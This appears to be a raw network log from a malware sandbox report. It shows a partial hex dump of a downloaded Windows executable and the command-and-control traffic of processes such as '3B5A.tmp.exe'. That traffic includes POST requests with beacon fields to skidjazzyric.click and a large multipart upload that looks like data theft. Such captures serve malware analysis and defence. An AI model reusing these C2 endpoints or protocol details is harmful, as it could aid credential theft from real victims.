                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 72 f6 05 ca 36 97 6b 99 36 97 6b 99 36 97 6b 99 8b d8 fd 99 37 97 6b 99 28 c5 ef 99 13 97 6b 99 28 c5 fe 99 28 97 6b 99 28 c5 e8 99 4c 97 6b 99 11 51 10 99 35 97 6b 99 36 97 6a 99 43 97 6b 99 28 c5 e1 99 37 97 6b 99 28 c5 ff 99 37 97 6b 99 28 c5 fa 99 37 97 6b 99 52 69 63 68 36 97 6b 99 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 02 9a cc 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 26 04 00 00 2e 01 00 00 00 00 00 b5 5e 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 0e b5 05 00 02 00 00 81 00 00 [TRUNCATED]
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$r6k6k6k7k(k((k(LkQ5k6jCk(7k(7k(7kRich6kPELe&.^@@+(( G@|.textp$& `.data@`*@.rsrc(@@
                                                                                              Jan 10, 2025 16:09:29.068862915 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2d 04 00 98 2d 04 00 ac 2d 04 00 c0 2d 04 00 de 2d 04 00 f4 2d 04 00 0a 2e 04 00 22 2e 04 00 36 2e 04 00 46 2e 04 00 56 2e
                                                                                              Data Ascii: ------.".6.F.V.f......../"/2/D/T/d/t////////040H0P0^0p0|00000011 181J1b1
                                                                                              Jan 10, 2025 16:09:29.068875074 CET1236INData Raw: 96 02 4d 43 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 02 3b 6e 40 00 da 6d 40 00 da 6d 40 00 00 00 00 00 00 00 00 00 00 00 f0 3f 7f 02 35 c2 68 21 a2 da 0f c9 3e 40 ff ff ff ff ff ff ef 7f 00 00 00 00 00 00 10 00 00 00 00 00 00 00 98 c0 00 00
                                                                                              Data Ascii: MC;n@m@m@?5h!>@@EncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAllocruntime error TLOSS error
                                                                                              Jan 10, 2025 16:09:29.068986893 CET1236INData Raw: 20 65 72 72 6f 72 0d 0a 00 00 00 00 52 36 30 31 36 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 74 68 72 65 61 64 20 64 61 74 61 0d 0a 00 0d 0a 54 68 69 73 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 68 61 73 20 72 65 71
                                                                                              Data Ascii: errorR6016- not enough space for thread dataThis application has requested the Runtime to terminate it in an unusual way.Please contact the application's support team for more information.R6009- not enough space for envir
                                                                                              Jan 10, 2025 16:09:29.068999052 CET1236INData Raw: a0 a0 2a 3e 00 00 00 00 00 00 e1 3f 00 00 00 94 7e 65 e0 3f a8 2d a9 f8 19 66 1b 3e 00 00 00 00 00 00 e2 3f 00 00 00 98 5d 25 e1 3f 44 09 b5 47 95 de 3f 3e 00 00 00 00 00 00 e3 3f 00 00 00 a8 0b e0 e1 3f 83 5c 9b 9f f5 f7 3e 3e 00 00 00 00 00 00
                                                                                              Data Ascii: *>?~e?-f>?]%?DG?>??\>>?X?1#>?E?h>???>??$49>?x8?k0H<>??r8>?8fm?"m>"
                                                                                              Jan 10, 2025 16:09:29.069011927 CET1236INData Raw: 00 00 00 24 51 2f f2 3f 0e 43 4a a9 85 fb 4f 3e 00 00 00 00 00 40 01 40 00 00 00 f8 b4 45 f2 3f 8c a4 86 84 88 91 47 3e 00 00 00 00 00 80 01 40 00 00 00 ec 92 5b f2 3f 8e 33 14 45 d2 7b 41 3e 00 00 00 00 00 c0 01 40 00 00 00 54 ef 70 f2 3f 94 53
                                                                                              Data Ascii: $Q/?CJO>@@E?G>@[?3E{A>@Tp?SfIS:>@X?B6)1<>@@3?>7>@$?s(N>@@?V6f=>@(?{>@@(W?-Jg >@
                                                                                              Jan 10, 2025 16:09:29.069024086 CET1236INData Raw: 30 39 43 3e 00 00 00 00 00 00 0e 40 00 00 00 94 fc fe f4 3f 04 0a 94 fb 3c c5 41 3e 00 00 00 00 00 40 0e 40 00 00 00 28 4a 07 f5 3f 10 49 8f 16 56 09 43 3e 00 00 00 00 00 80 0e 40 00 00 00 60 77 0f f5 3f bb 84 5e 04 40 a5 4e 3e 00 00 00 00 00 c0
                                                                                              Data Ascii: 09C>@?<A>@@(J?IVC>@`w?^@N>@?#%@>@s?MK>@@D'?Q->@.?9!G>@6?.1>@>?.1NcB> @cE?s1
                                                                                              Jan 10, 2025 16:09:29.069036961 CET1236INData Raw: 00 00 00 a0 8c 30 f6 3f bb af 69 49 71 0f 45 3e 00 00 00 00 00 80 15 40 00 00 00 c4 ce 34 f6 3f e6 68 61 f3 bb ad 3b 3e 00 00 00 00 00 a0 15 40 00 00 00 c8 04 39 f6 3f f9 8d 41 90 8c cd 44 3e 00 00 00 00 00 c0 15 40 00 00 00 e4 2e 3d f6 3f cc a4
                                                                                              Data Ascii: 0?iIqE>@4?ha;>@9?AD>@.=?KFw=@DMA?=@`E?apI0H> @gI?:->@@cM?%Q>`@@UQ?Ly5oE>@;U?vg0/>@
                                                                                              Jan 10, 2025 16:09:29.069047928 CET1236INData Raw: b7 bc 42 3e 00 00 00 00 00 e0 1b 40 00 00 00 78 c5 dc f6 3f 37 6f ac e5 2f ab 4d 3e 00 00 00 00 00 00 1c 40 00 00 00 fc 51 df f6 3f a7 4b 63 da 5a a8 30 3e 00 00 00 00 00 20 1c 40 00 00 00 d4 d8 e1 f6 3f fb 7a 2d 97 41 01 35 3e 00 00 00 00 00 40
                                                                                              Data Ascii: B>@x?7o/M>@Q?KcZ0> @?z-A5>@@Z?"BDcI>`@?`I.>@ L?Ld%>@?"l"w =@(??!>@?j^J>@8?H0
                                                                                              Jan 10, 2025 16:09:29.069058895 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 28 00 28 00 28 00 28 00 28 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00
                                                                                              Data Ascii: ((((( H
                                                                                              Jan 10, 2025 16:09:29.074150085 CET1236INData Raw: 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85
                                                                                              Data Ascii: 456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.949726104.21.56.704437508C:\Users\user\Desktop\Mmm7GmDcR4.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-10 15:09:27 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                              User-Agent: ShareScreen
                                                                                              Host: post-to-me.com
                                                                                              2025-01-10 15:09:28 UTC798INHTTP/1.1 200 OK
                                                                                              Date: Fri, 10 Jan 2025 15:09:28 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              X-Powered-By: PHP/5.4.16
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ue8lysPBXxkc%2Fx6dw7lhsGq4a8oSE3sU5p8VD5NfqnnAYTTBfpILAFcnDPPnrNzz8ZvQuFy%2FbpoixsOEOzc2cqbOXrjUxXsXCEX5wY0lXtFmMUTvmVaYj987xv0TZ5X8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8ffd9699a88e8cca-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1976&rtt_var=749&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1454183&cwnd=239&unsent_bytes=0&cid=ef69f771cd1b15dc&ts=497&x=0"
                                                                                              2025-01-10 15:09:28 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2025-01-10 15:09:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.949756104.21.32.14437688C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-10 15:09:31 UTC265OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: skidjazzyric.click
                                                                                              2025-01-10 15:09:31 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2025-01-10 15:09:32 UTC1129INHTTP/1.1 200 OK
                                                                                              Date: Fri, 10 Jan 2025 15:09:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=3ohafvo6d32kipdkungtr735ui; expires=Tue, 06 May 2025 08:56:11 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Koakiy%2Bv%2FAb1NwTtgCVwzJ5kMJfxNLTsSSO3WAm5SMwsRBRyJXKzy0kuYdIDbGpqJe8%2FDT%2BQPMJNHmBXVeUORTf5k7Y4ofamSbKvq7DdbV4kOeFjYBKVFmZREpotIaWN0lZfSLY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8ffd96b2ad2cc327-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1602&rtt_var=634&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3057&recv_bytes=909&delivery_rate=2521588&cwnd=190&unsent_bytes=0&cid=17d53ba5a9744d7b&ts=491&x=0"
                                                                                              2025-01-10 15:09:32 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2025-01-10 15:09:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.949762104.21.32.14437688C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-10 15:09:32 UTC266OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 74
                                                                                              Host: skidjazzyric.click
                                                                                              2025-01-10 15:09:32 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                                              2025-01-10 15:09:33 UTC1126INHTTP/1.1 200 OK
                                                                                              Date: Fri, 10 Jan 2025 15:09:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=t1p5q88rv7js7hbnh1dc85egq7; expires=Tue, 06 May 2025 08:56:12 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBUDy3MXqnQrQ0Zm0Ie7nFJzp9ioHL9TCZ3%2BVPLKvMQtOlEmAnhKHHV%2By9ZQlulRKok4hP6XWnaGzk%2FEg8qpU197M89Wto4RdO7014GCNsKNIVXInI2RDshvJdfW3KgdcBHo47E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8ffd96b8ffc84344-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1673&rtt_var=655&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3058&recv_bytes=976&delivery_rate=2455156&cwnd=48&unsent_bytes=0&cid=274b14be11985905&ts=539&x=0"
                                                                                              2025-01-10 15:09:33 UTC243INData Raw: 63 34 36 0d 0a 77 43 79 41 73 49 5a 38 43 30 45 52 62 44 36 78 46 76 54 43 31 2f 50 70 32 30 67 30 32 66 69 66 34 37 45 71 66 34 62 33 71 66 75 37 44 76 61 53 76 45 67 6e 59 32 49 4a 48 49 74 69 68 72 65 79 33 38 75 36 4c 42 62 6a 6e 76 36 50 77 6b 39 54 70 49 48 45 32 66 70 4b 34 64 7a 31 47 53 64 6a 64 42 51 63 69 30 32 50 34 4c 4b 64 79 2b 46 71 55 62 4f 61 2f 6f 2f 54 53 78 54 70 68 38 57 59 71 45 44 6e 32 4f 4d 66 62 79 42 39 41 56 76 55 63 35 57 6f 75 5a 71 45 73 79 55 57 39 64 72 36 6d 5a 4d 51 58 63 75 53 33 5a 71 4e 54 66 50 62 70 41 45 6e 4f 6a 4d 4a 55 4a 4d 73 31 71 4f 79 6b 59 57 39 4c 46 2b 78 6b 50 65 48 30 6b 34 56 39 70 37 50 6b 36 68 4f 35 4e 6e 70 46 6e 73 74 64 77 5a 51 30 6e 6d 56 34 50 76 52 6a 4b
                                                                                              Data Ascii: c46wCyAsIZ8C0ERbD6xFvTC1/Pp20g02fif47Eqf4b3qfu7DvaSvEgnY2IJHItihrey38u6LBbjnv6Pwk9TpIHE2fpK4dz1GSdjdBQci02P4LKdy+FqUbOa/o/TSxTph8WYqEDn2OMfbyB9AVvUc5WouZqEsyUW9dr6mZMQXcuS3ZqNTfPbpAEnOjMJUJMs1qOykYW9LF+xkPeH0k4V9p7Pk6hO5NnpFnstdwZQ0nmV4PvRjK
                                                                                              2025-01-10 15:09:33 UTC1369INData Raw: 46 71 44 76 76 4a 7a 34 4c 43 57 51 6a 70 68 63 33 5a 76 51 44 37 6b 75 4d 53 4b 58 73 7a 42 6c 44 64 63 5a 57 76 73 70 43 4c 71 79 56 57 75 4a 4c 31 68 64 6c 48 45 75 75 62 77 5a 36 71 52 2b 58 64 34 78 5a 76 4c 48 42 4f 45 70 4e 7a 6a 75 44 74 30 61 75 70 4b 56 57 76 6c 2b 7a 42 7a 41 59 45 70 4a 4c 48 32 66 6f 4f 35 4e 7a 6c 45 32 6b 78 65 77 56 58 31 6d 61 64 71 62 69 63 69 37 51 67 57 62 69 61 2b 6f 76 5a 52 78 66 67 6d 4d 61 66 6f 6b 36 69 6e 4b 51 5a 63 57 4d 72 54 6e 2f 57 5a 4a 47 73 6f 39 4f 78 2b 54 55 59 6f 74 72 36 6a 5a 4d 51 58 65 79 51 79 4a 71 70 51 65 48 61 37 77 78 70 4d 58 55 44 57 63 46 79 6b 36 36 2f 6b 70 6d 7a 4a 46 43 34 6b 2f 61 49 31 6b 38 5a 70 4e 75 4c 6e 72 6f 4f 75 70 4c 46 45 32 49 76 65 52 6c 63 6b 32 76 59 75 66 57 57 68
                                                                                              Data Ascii: FqDvvJz4LCWQjphc3ZvQD7kuMSKXszBlDdcZWvspCLqyVWuJL1hdlHEuubwZ6qR+Xd4xZvLHBOEpNzjuDt0aupKVWvl+zBzAYEpJLH2foO5NzlE2kxewVX1madqbici7QgWbia+ovZRxfgmMafok6inKQZcWMrTn/WZJGso9Ox+TUYotr6jZMQXeyQyJqpQeHa7wxpMXUDWcFyk66/kpmzJFC4k/aI1k8ZpNuLnroOupLFE2IveRlck2vYufWWh
                                                                                              2025-01-10 15:09:33 UTC1369INData Raw: 30 6c 2f 48 42 6e 51 67 61 2f 4e 57 54 32 59 68 4e 39 74 48 75 58 46 77 67 66 51 42 62 78 54 53 4a 37 71 7a 52 6a 4c 56 71 44 76 75 58 2f 49 6e 56 57 68 4c 70 6c 73 57 58 72 55 76 74 32 75 51 65 5a 43 5a 33 42 56 66 51 65 5a 4b 79 76 35 47 44 76 43 74 63 73 64 71 7a 77 64 52 51 58 62 7a 56 2b 6f 36 70 44 4e 66 52 36 68 42 75 4e 54 4d 52 45 73 6f 30 6b 61 7a 31 79 63 75 30 49 6c 4f 2b 6c 66 79 4c 33 55 30 58 36 4a 33 46 6d 72 42 42 35 74 4c 6f 46 6d 4d 75 66 51 70 55 32 6e 2b 64 70 72 57 51 67 66 6c 6b 46 72 79 43 76 64 6d 54 66 42 72 6f 6d 4d 54 62 6c 30 33 73 33 4f 4d 49 4b 54 77 39 46 78 7a 55 65 4e 62 34 39 5a 32 43 75 53 46 63 76 35 72 36 6a 4e 5a 4c 47 75 65 59 7a 4a 4f 73 53 65 62 65 37 52 4e 76 49 33 51 4b 57 63 46 78 6e 36 79 35 30 63 58 35 4c 55
                                                                                              Data Ascii: 0l/HBnQga/NWT2YhN9tHuXFwgfQBbxTSJ7qzRjLVqDvuX/InVWhLplsWXrUvt2uQeZCZ3BVfQeZKyv5GDvCtcsdqzwdRQXbzV+o6pDNfR6hBuNTMREso0kaz1ycu0IlO+lfyL3U0X6J3FmrBB5tLoFmMufQpU2n+dprWQgflkFryCvdmTfBromMTbl03s3OMIKTw9FxzUeNb49Z2CuSFcv5r6jNZLGueYzJOsSebe7RNvI3QKWcFxn6y50cX5LU
                                                                                              2025-01-10 15:09:33 UTC168INData Raw: 77 64 52 45 58 62 7a 56 77 70 43 77 51 4f 7a 62 36 52 68 68 4a 48 30 44 56 39 56 2f 6b 61 65 7a 6e 49 4f 30 4c 31 57 36 6e 76 65 54 30 45 4d 58 36 5a 2b 4c 31 2b 4a 4a 2b 70 4b 38 58 6b 34 76 57 68 35 48 77 57 4c 57 76 2f 75 49 79 37 34 6d 46 75 50 61 2f 6f 37 61 52 78 58 73 6d 73 53 64 72 45 6a 6b 33 2b 45 52 59 7a 46 37 41 46 48 59 65 35 32 79 74 5a 79 50 74 53 35 65 73 4a 43 39 7a 35 4e 50 42 61 54 4e 69 36 79 76 51 65 4c 52 38 6c 35 32 62 57 70 4f 57 39 38 30 7a 75 43 35 6e 34 75 32 4a 6c 0d 0a
                                                                                              Data Ascii: wdREXbzVwpCwQOzb6RhhJH0DV9V/kaeznIO0L1W6nveT0EMX6Z+L1+JJ+pK8Xk4vWh5HwWLWv/uIy74mFuPa/o7aRxXsmsSdrEjk3+ERYzF7AFHYe52ytZyPtS5esJC9z5NPBaTNi6yvQeLR8l52bWpOW980zuC5n4u2Jl
                                                                                              2025-01-10 15:09:33 UTC1369INData Raw: 31 30 36 36 0d 0a 71 77 6b 76 79 4e 33 55 38 59 37 5a 33 44 69 36 4e 4b 36 74 50 71 45 57 67 6e 64 67 74 59 31 48 43 51 72 2f 58 66 79 37 34 79 46 75 50 61 30 71 62 6d 43 6a 7a 65 31 64 54 58 75 77 37 6c 33 71 52 47 4b 53 39 77 41 6c 54 63 63 70 2b 73 76 35 69 41 74 53 46 53 74 35 50 34 68 39 4a 4e 47 4f 57 52 78 35 4f 6b 54 65 48 64 36 78 46 68 59 7a 31 4f 57 38 73 30 7a 75 43 51 68 6f 43 33 4c 42 61 6b 31 4f 54 42 31 45 52 64 76 4e 58 48 6b 4b 52 49 35 39 37 6c 47 47 45 6d 65 77 70 64 31 58 4b 56 72 37 47 55 69 72 59 75 57 72 57 51 2f 49 44 66 51 78 4c 76 6b 49 76 58 34 6b 6e 36 6b 72 78 65 57 43 42 6c 47 55 7a 66 4e 49 6e 75 72 4e 47 4d 74 57 6f 4f 2b 35 76 76 69 39 6c 47 47 4f 75 51 79 4a 61 6c 51 2b 54 65 37 68 64 68 4a 58 77 48 54 74 42 34 6d 4b 65
                                                                                              Data Ascii: 1066qwkvyN3U8Y7Z3Di6NK6tPqEWgndgtY1HCQr/Xfy74yFuPa0qbmCjze1dTXuw7l3qRGKS9wAlTccp+sv5iAtSFSt5P4h9JNGOWRx5OkTeHd6xFhYz1OW8s0zuCQhoC3LBak1OTB1ERdvNXHkKRI597lGGEmewpd1XKVr7GUirYuWrWQ/IDfQxLvkIvX4kn6krxeWCBlGUzfNInurNGMtWoO+5vvi9lGGOuQyJalQ+Te7hdhJXwHTtB4mKe
                                                                                              2025-01-10 15:09:33 UTC1369INData Raw: 54 68 5a 76 4a 33 30 69 73 46 43 47 75 4f 65 77 35 4b 74 53 50 44 65 36 67 78 73 4d 57 46 4f 45 70 4e 7a 6a 75 44 74 30 62 32 2b 4f 6b 61 34 32 4d 79 58 30 46 34 57 36 5a 6d 4c 68 75 78 58 6f 74 58 6f 58 6a 46 6a 64 51 46 56 30 48 75 58 71 62 6d 63 6a 72 41 76 56 37 32 65 39 34 76 54 54 68 76 6c 6b 4d 47 61 6f 30 54 72 31 65 77 5a 61 6a 45 7a 51 42 7a 55 62 4e 62 34 39 62 69 4d 71 79 52 47 2b 34 57 7a 6d 4a 4e 50 45 61 54 4e 69 35 32 6f 51 65 62 56 36 42 68 73 4a 58 34 50 55 39 4a 30 6d 61 53 2b 6d 49 32 34 4a 31 4f 32 6e 75 2b 4c 32 45 63 52 37 5a 6e 47 32 65 77 4f 35 63 71 6b 52 69 6b 53 66 67 42 53 31 47 4c 57 76 2f 75 49 79 37 34 6d 46 75 50 61 2f 49 33 63 53 78 4c 6e 6c 73 71 54 73 46 7a 75 32 2b 77 62 5a 53 68 39 43 45 37 56 65 35 2b 6a 74 70 69 4d
                                                                                              Data Ascii: ThZvJ30isFCGuOew5KtSPDe6gxsMWFOEpNzjuDt0b2+Oka42MyX0F4W6ZmLhuxXotXoXjFjdQFV0HuXqbmcjrAvV72e94vTThvlkMGao0Tr1ewZajEzQBzUbNb49biMqyRG+4WzmJNPEaTNi52oQebV6BhsJX4PU9J0maS+mI24J1O2nu+L2EcR7ZnG2ewO5cqkRikSfgBS1GLWv/uIy74mFuPa/I3cSxLnlsqTsFzu2+wbZSh9CE7Ve5+jtpiM
                                                                                              2025-01-10 15:09:33 UTC1369INData Raw: 75 4c 2b 70 43 54 45 41 76 30 67 73 79 47 37 46 65 69 31 65 68 65 4d 57 4e 31 42 31 72 55 63 70 69 79 73 4a 65 45 74 69 4e 66 76 35 4c 2b 67 64 64 4d 47 75 47 57 78 35 4b 6c 54 65 33 57 37 52 42 67 4c 44 4e 41 48 4e 52 73 31 76 6a 31 73 4a 43 36 4a 6c 76 37 68 62 4f 59 6b 30 38 52 70 4d 32 4c 6c 61 78 4c 34 74 6a 69 47 6d 77 6c 65 51 74 63 32 48 65 5a 70 4c 4f 56 68 4c 6b 68 58 37 71 63 2b 49 76 59 54 68 44 6e 6b 38 33 5a 37 41 37 6c 79 71 52 47 4b 51 4e 6f 41 31 44 55 4e 49 6e 75 72 4e 47 4d 74 57 6f 4f 2b 35 48 78 68 64 52 49 45 4f 65 64 7a 70 32 6f 53 2b 4c 61 39 68 5a 70 4a 47 45 63 58 4e 70 78 6d 71 4f 31 6c 59 32 77 4c 46 57 2f 32 72 50 42 31 46 42 64 76 4e 58 6d 6c 61 56 6e 35 63 6d 6b 41 53 63 36 4d 77 6c 51 6b 79 7a 57 6f 62 36 62 68 4c 51 70 55
                                                                                              Data Ascii: uL+pCTEAv0gsyG7Fei1eheMWN1B1rUcpiysJeEtiNfv5L+gddMGuGWx5KlTe3W7RBgLDNAHNRs1vj1sJC6Jlv7hbOYk08RpM2LlaxL4tjiGmwleQtc2HeZpLOVhLkhX7qc+IvYThDnk83Z7A7lyqRGKQNoA1DUNInurNGMtWoO+5HxhdRIEOedzp2oS+La9hZpJGEcXNpxmqO1lY2wLFW/2rPB1FBdvNXmlaVn5cmkASc6MwlQkyzWob6bhLQpU
                                                                                              2025-01-10 15:09:33 UTC99INData Raw: 58 6b 78 42 50 71 74 58 5a 32 66 6f 4f 70 64 48 32 44 47 38 67 5a 51 30 62 37 55 71 78 75 72 69 58 6e 4b 67 55 61 4c 79 41 38 49 66 45 57 56 48 78 6c 73 57 58 70 56 69 69 6e 4b 51 52 4b 58 74 4b 54 68 53 54 53 39 6a 67 72 64 48 54 2b 52 39 56 74 5a 54 36 6c 38 49 46 4f 76 36 59 7a 59 36 7a 0d 0a
                                                                                              Data Ascii: XkxBPqtXZ2foOpdH2DG8gZQ0b7UqxuriXnKgUaLyA8IfEWVHxlsWXpViinKQRKXtKThSTS9jgrdHT+R9VtZT6l8IFOv6YzY6z
                                                                                              2025-01-10 15:09:33 UTC1369INData Raw: 38 31 34 0d 0a 44 71 79 53 34 6c 34 78 63 7a 31 4f 57 4d 49 30 7a 76 44 6e 79 74 37 71 66 51 62 70 68 62 4f 59 6b 31 35 64 76 4d 65 46 32 62 41 4f 75 70 4b 6a 48 58 73 78 64 51 31 4b 30 44 4f 6f 6e 70 75 57 6a 62 77 74 52 76 6d 30 39 70 58 55 43 46 4f 6b 6d 6f 76 42 6d 77 36 71 6b 74 74 51 4b 54 73 7a 56 68 7a 6d 64 35 69 75 73 6f 65 61 39 41 52 52 76 5a 2f 36 6b 5a 46 6d 46 76 43 53 69 39 66 69 53 4b 4b 4b 74 46 41 70 4a 32 4a 4f 42 49 4d 6d 7a 66 58 6d 78 74 76 72 4e 52 69 69 32 75 76 42 69 78 70 54 70 49 65 4c 77 65 49 4a 34 63 44 32 47 47 6f 31 63 45 6c 69 37 58 65 41 72 62 71 61 69 6f 63 55 65 4c 61 62 2f 6f 2b 52 65 51 76 70 68 63 69 63 70 58 44 63 33 4f 4d 4b 62 69 31 31 44 68 79 64 4e 4a 6e 67 37 61 6a 4c 38 57 70 70 39 64 72 6c 77 59 73 49 4b 4f
                                                                                              Data Ascii: 814DqyS4l4xcz1OWMI0zvDnyt7qfQbphbOYk15dvMeF2bAOupKjHXsxdQ1K0DOonpuWjbwtRvm09pXUCFOkmovBmw6qkttQKTszVhzmd5iusoea9ARRvZ/6kZFmFvCSi9fiSKKKtFApJ2JOBIMmzfXmxtvrNRii2uvBixpTpIeLweIJ4cD2GGo1cEli7XeArbqaiocUeLab/o+ReQvphcicpXDc3OMKbi11DhydNJng7ajL8Wpp9drlwYsIKO


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.949768104.21.32.14437688C:\Users\user\AppData\Local\Temp\3B5A.tmp.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-10 15:09:34 UTC274OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=1XGZ0SPZ
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 12780
                                                                                              Host: skidjazzyric.click
